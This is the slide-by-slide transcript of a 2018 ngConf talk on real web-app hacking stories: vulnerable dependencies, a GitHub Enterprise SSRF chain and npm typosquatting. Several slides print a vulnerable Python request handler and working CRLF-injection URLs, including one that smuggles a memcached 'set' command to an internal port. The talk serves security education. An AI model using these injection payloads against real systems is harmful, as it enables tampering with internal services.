How to hack an Angular app? - ngConf 2018

Transcript

1. How to hack an Angular app? @jawache ngConf 2018

2. How to hack a web app? @jawache ngConf 2018

3. Real Life Hacking Stories @jawache ngConf 2018

4. Asim Hussain @jawache codecraft.tv microsoft.com

5. None

6. Vulnerability vs. Exploit

7. @jawache #1

8. @jawache Photo by Kristina Flour on Unsplash 0 Day Exploit

9. @jawache Photo by Veri Ivanova on Unsplash 0 Day Exploit

10. None

11. @jawache

12. @jawache

13. @jawache

14. @jawache

15. "12 of top 50 data breaches were through known vulnerabilities"

    - snyk.io https://snyk.io/blog/owasp-top-10-breaches/ @jawache

16. "77% of 433,000 Sites Use Vulnerable JavaScript Libraries" - snyk.io

    https://snyk.io/blog/77-percent-of-sites-still-vulnerable/ @jawache
17. None

18. @jawache

19. @jawache nsp

20. @jawache Photo by energepic.com from Pexels Summary

21. #2 @orange_8361

22. None

23. git push @jawache http://example.com

24. @jawache git push http://0

25. @jawache git push http://0:8000/composer/send_email

26. def send_email(request): try: recipients = request.GET['to'].split(',') url = request.GET['url'] proto,

    server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse() ... @jawache

27. http://0:8000/composer/send_email? to=orange@nogg& url=http://127.0.0.1:12345/foo @jawache

28. def send_email(request): try: recipients = request.GET['to'].split(',') url = request.GET['url'] proto,

    server, path, query, frag = urlsplit(url) if query: path += '?' + query conn = HTTPConnection(server) conn.request('GET',path) resp = conn.getresponse() ... @jawache

29. \r\n @jawache

30. %0D%0A @jawache

31. http://127.0.0.1:12345/%0D%0Ahello%0D%0AFoo: @jawache

32. GET /%0D%0Ahello%0D%0AFoo: HTTP/1.1 Host: 127.0.0.1:12345 Accept-Encoding: identity @jawache

33. GET /%0D%0Ahello%0D%0AFoo:\r\n HTTP/1.1\r\n Host: 127.0.0.1:12345\r\n Accept-Encoding: identity\r\n \r\n \r\n @jawache

34. @jawache GET /\r\n hello\r\n Foo: HTTP/1.1\r\n Host: 127.0.0.1:12345\r\n Accept-Encoding: identity\r\n

    \r\n \r\n

35. ...:11211/%0D%0Aset%20key%200%20900%204%20data%0D%0A @jawache

36. GET / set key 0 900 4 data HTTP/1.1 Host:

    127.0.0.1:11211 Accept-Encoding: identity @jawache

37. code code @jawache

38. code code @jawache

39. @jawache Photo by Kelly Sikkema on Unsplash Summary

40. #3 @jawache

41. @jawache

42. @jawache

43. None

44. @jawache

45. cross-env vs. crossenv @jawache

46. @jawache Photo by Jairo Alzate on Unsplash Summary

47. @scope/package-name @jawache

48. package-name packagename package.name @jawache

49. Update Small vulnerability Don't trust anyone All the things Fix

    @jawache

50. Asim Hussain @jawache codecraft.tv microsoft.com

51. #1 How I Chained 4 vulnerabilities on GitHub Enterprise -

    Orange Tsai http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html CRLF injection vulnerability in the HTTPConnection https://www.cvedetails.com/cve/CVE-2016-5699/

52. #2 Exploit DB https://www.exploit-db.com/ Metasploit https://www.metasploit.com/ Azure App Services https://aka.ms/azure-app-service-docs

    Google App Engine https://cloud.google.com/appengine/ Heroku https://heroku.com Amazon Beanstack http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html The Equifax hack and how to protect your family — all explained in 5 minutes https://medium.freecodecamp.org/the-equifax-hack-and-how-to-protect-your-family-all-explained-in-5-minutes-a2b5187cb6c0

53. #3 Oscar Bolmsten on Twitter https://twitter.com/o_cee/status/892306836199800836 Malicious packages in npm.

    Here’s what to do - Ivan Akulov https://iamakulov.com/notes/npm-malicious-packages/